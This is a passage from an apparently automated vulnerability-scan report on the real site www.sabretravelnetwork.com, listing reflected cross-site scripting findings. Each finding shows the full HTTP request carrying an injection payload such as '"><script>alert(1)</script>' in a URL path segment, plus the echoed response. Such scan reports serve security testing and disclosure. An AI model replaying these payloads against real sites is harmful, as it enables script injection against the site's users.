Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621735; expires=Tue, 02-Oct-2012 01:02:15 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A58%3A%22%2Fproducts_services%2Ftravel_agency%2F19a8e293e5add7d2a5f3772f%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:02:15 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13882


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>4c5fb7d26fc">home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C2a892<a>4c5fb7d26fc</a>
...[SNIP]...

4.379. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8de"><script>alert(1)</script>2b275f81327 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346fe8de"><script>alert(1)</script>2b275f81327/images/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621754; expires=Tue, 02-Oct-2012 01:02:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A67%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts19a8e293c4186d9d9cfab9cf%2F%22%3Bi%3A3%3Bs%3A58%3A%22%2Fproducts_services%2Ftravel_agency%2F19a8e293e5add7d2a5f3772f%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:02:34 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346fe8de"><script>alert(1)</script>2b275f81327/images">
...[SNIP]...

4.380. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 38a21<a>ff4ccfafe83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b934638a21<a>ff4ccfafe83/images/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621755; expires=Tue, 02-Oct-2012 01:02:35 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A67%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts19a8e293c4186d9d9cfab9cf%2F%22%3Bi%3A3%3Bs%3A58%3A%22%2Fproducts_services%2Ftravel_agency%2F19a8e293e5add7d2a5f3772f%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:02:35 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13863


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>ff4ccfafe83">script%3E101846b934638a21<a>ff4ccfafe83</a>
...[SNIP]...

4.381. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4977"><script>alert(1)</script>d04db2b8ad1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/imagesa4977"><script>alert(1)</script>d04db2b8ad1/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:03:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621789; expires=Tue, 02-Oct-2012 01:03:09 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A4%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:03:09 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14090


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/imagesa4977"><script>alert(1)</script>d04db2b8ad1/images">
...[SNIP]...

4.382. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2f56c<a>259623de4a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images2f56c<a>259623de4a6/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:03:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621795; expires=Tue, 02-Oct-2012 01:03:15 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:03:15 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13844


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>259623de4a6">images2f56c<a>259623de4a6</a>
...[SNIP]...

4.383. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62f34"><script>alert(1)</script>288b2c2fbbd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images62f34"><script>alert(1)</script>288b2c2fbbd/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:04:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621874; expires=Tue, 02-Oct-2012 01:04:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:04:34 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14054


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images62f34"><script>alert(1)</script>288b2c2fbbd/loadingAnimation.gif">
...[SNIP]...

4.384. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5800b<a>6c1831f5800 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images5800b<a>6c1831f5800/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:04:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621876; expires=Tue, 02-Oct-2012 01:04:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:04:36 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>6c1831f5800">images5800b<a>6c1831f5800</a>
...[SNIP]...

4.385. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 767b3<a>1193ca6ed29 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif767b3<a>1193ca6ed29 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:06:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621966; expires=Tue, 02-Oct-2012 01:06:06 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:06:06 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>1193ca6ed29">loadingAnimation.gif767b3<a>1193ca6ed29</a>
...[SNIP]...

4.386. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87d0d"><a>7693b842da8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif87d0d"><a>7693b842da8 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:05:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621929; expires=Tue, 02-Oct-2012 01:05:29 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:05:29 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13810


